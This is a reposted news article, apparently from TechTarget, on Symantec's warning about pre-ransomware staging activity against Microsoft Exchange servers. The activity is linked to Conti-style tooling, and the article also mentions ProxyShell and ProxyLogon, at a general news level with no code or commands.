Symantec: Staging activity observed on Exchange servers - TechTarget

cicingwos.blogspot.com

Early ransomware staging signs have been spotted against Microsoft Exchange servers.

In a security bulletin Wednesday, Symantec warned of potential pre-ransomware activity targeting the email platform. The software vendor said it "observed" attempts by threat actors to install "legitimate remote control software" and tools on the targeted networks of several U.S. sectors, including energy and healthcare. Threat actors also tried to exfiltrate data from at least one target using Rclone. The open source application can be effective in leveraging double extortion tactics.

The final payload of this campaign, according to Symantec, remains unknown. However, it mimics the activity of a known ransomware gang.

"The observed pre-encryption attack chain and tools are consistent with public reports of recent Conti ransomware activity," the advisory said.

That includes Cobalt Strike and credential theft tools like Mimikatz, as well as network and domain discovery tools. Past Conti attacks have leveraged Cobalt Strike.

Conti gained attention after ongoing attacks against U.S. companies and hospitals prompted an alert from the FBI in May. That same month, Conti hit data backup specialist ExaGrid for $2.6 million after exfiltrating a variety of data, including employee records. It appears the situation is only escalating.

On Wednesday, a joint advisory by the Cybersecurity and Infrastructure Security Agency, FBI and National Security Agency (NSA) warned of "increased Conti ransomware attacks."

While operators behind the pre-ransomware activity have not been confirmed, the staging activity has. Security researcher Kevin Beaumont took to Twitter Wednesday to separately verify Broadcam's report.

Broadcom are today reporting pre-ransomware staging activity on Microsoft Exchange servers.

I can independently confirm this - just seen a US honeypot stuffed with this tools. https://t.co/v8wJ29xL21 pic.twitter.com/G6pe6hclGY

— Kevin Beaumont (@GossiTheDog) September 22, 2021

Last month, Beaumont tracked another issue discovered in Microsoft Exchange servers, a chain of attacks that actively exploited three different flaws known as ProxyShell. The high-severity flaws enabled remote code execution and two scored 9.8 on the common vulnerabilities and scoring system. Exchange servers were also affected by ProxyLogon, a server-side request forgery flaw. Though all four vulnerabilities were disclosed and patched, servers remained vulnerable.

It is unknown whether the threat actors mentioned in Symantec's report are exploiting any of the Proxy flaws.

Adblock test (Why?)

"activity" - Google News
September 23, 2021 at 02:33AM
https://ift.tt/3zyB6wn

Symantec: Staging activity observed on Exchange servers - TechTarget
"activity" - Google News
https://ift.tt/3ddCXMh
https://ift.tt/2WkO13c

Bagikan Berita Ini